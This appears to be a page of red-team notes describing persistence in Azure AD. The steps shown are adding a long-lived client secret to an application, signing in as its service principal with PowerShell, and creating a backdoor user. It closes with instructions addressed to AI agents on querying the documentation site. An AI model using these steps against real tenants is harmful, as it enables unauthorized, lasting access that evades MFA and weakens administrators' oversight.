# Service Principal Abuse This persistence method consists in backdooring Azure applications leveraging the permissions of a SP account to gain SSO access to the environment with the permissions of that applications without the need for credentials. The main benefits of attacking SP accounts is that these accounts can't have MFA enforced on login and they are created by default along with **any** application, the only downside is the possible presence of a Conditional Access Policy that enforces other conditions on the login process but it still isn't enough to set MFA on a Service Principal account. Once we created an application (or we took control of an existing one) we want to add a Client Secret with a pretty generous expiration period; this secret is the password we'll be able to use to log into the application. As we already did in [Abusing Cloud Administrator Role](https://otter.gitbook.io/red-teaming/notes/aad/abusing-cloud-administrator-role) we can now log into the application as a Service Principal ```powershell PS /home/otter> az login --service-prinipal -u -p --tenant ``` Another method we can use to log into the SP account is using Graph API ```powershell PS /home/otter> $AppId = "" PS /home/otter> $TenantId = "" PS /home/otter> $ClientSecret = "" PS /home/otter> $body = @{ >> Grant_Type = "client_credentials" >> Scope = "https://graph.microsoft.com/.default" >> Client_Id = $AppId >> Client_Secret = $ClientSecret >> } PS /home/otter> $connection = Invoke-RestMethod ` >> -Uri https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token ` >> -Method POST ` >> -Body $body PS /home/otter> $token = $connection.access_token PS /home/otter> Connect-MgGraph -AccessToken $token ``` Since the SP account has the same permissions as its application we need to pick an application with "interesting" permissions over the tenant; ideally we'd want to create a new user account as a persistence mechanism, to do so we need the `new-MgUser` permissions so can use the following commands to list all the permissions required to perform that action. ```powershell PS /home/otter> (Find-MgGraphCommand -command new-MgUser).permissions # list permissions we have PS /home/otter> Get-MgContext | Select -ExpandProperty Scopes ``` If the application already has these permissions or we can delegate them to the app itself we are able to create a new user account. ```powershell PS /home/otter> New-MgUser -DisplayName "Otter Sec" -PasswordProfile $PasswordProfile -AccountDisabled -MailNickName "otter" -UserPrincipalName "ottersec@minions.onmicrosoft.com" ``` The final step is to log in as this user and change their password. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://otter.gitbook.io/red-teaming/notes/aad/service-principal-abuse.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.